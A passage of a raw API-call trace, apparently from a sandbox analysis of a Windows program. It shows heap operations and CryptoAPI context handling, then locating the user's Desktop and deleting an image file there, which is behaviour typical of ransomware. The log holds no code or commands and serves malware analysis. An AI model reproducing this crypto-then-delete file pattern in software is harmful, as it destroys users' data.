Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.245] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0153.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0153.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0153.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0153.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0153.248] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0153.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0153.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.248] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0153.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0153.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0153.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0153.251] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.251] FreeLibrary (hLibModule=0x756e0000) returned 1 [0153.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0153.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0153.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0153.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0153.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0153.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0153.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0153.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.253] CloseHandle (hObject=0x2d0) returned 1 [0153.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0153.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0153.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0153.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0153.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0153.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0153.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0153.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0153.256] CloseHandle (hObject=0x2a0) returned 1 [0153.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0153.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0153.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0153.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0153.264] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0153.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0153.264] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/GHvT80V7X_pq3d.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GHvT80V7X_pq3d.png", lpFilePart=0x8cedf4*="GHvT80V7X_pq3d.png") returned 0x2a [0153.264] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GHvT80V7X_pq3d.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ghvt80v7x_pq3d.png")) returned 0x20 [0153.265] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GHvT80V7X_pq3d.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f655430, ftCreationTime.dwHighDateTime=0x1d5ef86, ftLastAccessTime.dwLowDateTime=0xfafe4e70, ftLastAccessTime.dwHighDateTime=0x1d5e675, ftLastWriteTime.dwLowDateTime=0xfafe4e70, ftLastWriteTime.dwHighDateTime=0x1d5e675, nFileSizeHigh=0x0, nFileSizeLow=0x14189, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="GHvT80V7X_pq3d.png", cAlternateFileName="GHVT80~1.PNG")) returned 0xa875d0 [0153.265] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GHvT80V7X_pq3d.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ghvt80v7x_pq3d.png")) returned 1 [0153.350] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f655430, ftCreationTime.dwHighDateTime=0x1d5ef86, ftLastAccessTime.dwLowDateTime=0xfafe4e70, ftLastAccessTime.dwHighDateTime=0x1d5e675, ftLastWriteTime.dwLowDateTime=0xfafe4e70, ftLastWriteTime.dwHighDateTime=0x1d5e675, nFileSizeHigh=0x0, nFileSizeLow=0x14189, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="GHvT80V7X_pq3d.png", cAlternateFileName="GHVT80~1.PNG")) returned 0 [0153.351] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0153.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0153.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0153.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0153.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0153.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0153.351] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0153.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0153.351] RtlAllocateHeap (HeapHandle=0x970000, 